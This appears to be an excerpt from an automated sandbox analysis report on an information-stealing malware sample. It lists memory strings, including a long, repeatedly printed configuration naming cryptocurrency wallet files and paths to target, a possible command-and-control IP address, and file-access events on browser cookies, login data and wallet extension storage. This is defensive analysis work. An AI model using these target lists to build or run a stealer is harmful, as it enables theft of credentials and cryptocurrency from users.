                                    Source: Yara matchFile source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Found many strings related to Crypto-Wallets (likely being stolen)
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: Electrum
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: \Electrum\wallets\
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1620659992.000000000191D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: exodus.conf.json
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: \Exodus\
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: ElectrumLTC
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: \Ethereum\
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600004491.0000000005F70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3IW
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: Ethereum
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1620659992.000000000191D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 185.215.113.16tti\AppData\Roaming\MultiDoge\multidoge.wallet*
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600078469.0000000001915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger LiveMKAB
                                    Tries to harvest and steal Bitcoin Wallet information
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
